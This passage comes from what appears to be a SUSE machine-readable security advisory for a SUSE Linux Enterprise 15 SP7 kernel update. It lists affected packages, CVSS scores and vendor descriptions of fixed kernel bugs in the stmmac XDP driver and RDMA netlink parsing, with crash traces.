"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n 